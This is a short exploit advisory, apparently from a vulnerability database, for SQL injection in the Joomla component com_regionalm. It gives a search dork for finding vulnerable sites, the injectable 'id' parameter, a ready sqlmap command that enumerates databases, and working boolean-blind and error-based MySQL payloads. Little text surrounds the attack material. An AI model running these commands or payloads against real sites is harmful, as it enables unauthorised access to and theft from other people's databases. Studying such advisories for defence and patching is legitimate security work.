Joomla! Com_regionalm SQL Injection

2018.12.17
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

Author : Security007 Tested on : ubuntu 18.04 Vendor Homepage : http://www.joomla.org Dork : inurl:index.php?option=com_regionalm Parameter : id (GET) Injection point : http://localhost/index.php?option=com_regionalm&task=regionalmuseum&id=12[ Inject Here ]&Itemid=139&lang=en Proof Of Concept: sqlmap -u "http://localhost/index.php?option=com_regionalm&task=regionalmuseum&id=12&Itemid=139&lang=en " --risk=3 --level=5 --random-agent --dbs -p id Parameter: id (GET) Type: boolean-based blind Title: Boolean-based blind - Parameter replace (DUAL) Payload: option=com_regionalm&task=regionalmuseum&id=(CASE WHEN (1573=1573) THEN 1573 ELSE 1573*(SELECT 1573 FROM DUAL UNION SELECT 9674 FROM DUAL) END) Type: error-based Title: MySQL >= 5.0 error-based - Parameter replace (FLOOR) Payload: option=com_regionalm&task=regionalmuseum&id=(SELECT 6600 FROM(SELECT COUNT(*),CONCAT(0x7171767071,(SELECT (ELT(6600=6600,1))),0x716a707671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

References:

https://defacementsec007.blogspot.com/2018/12/joomla-comregionalm-sql-injection-0day.html


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top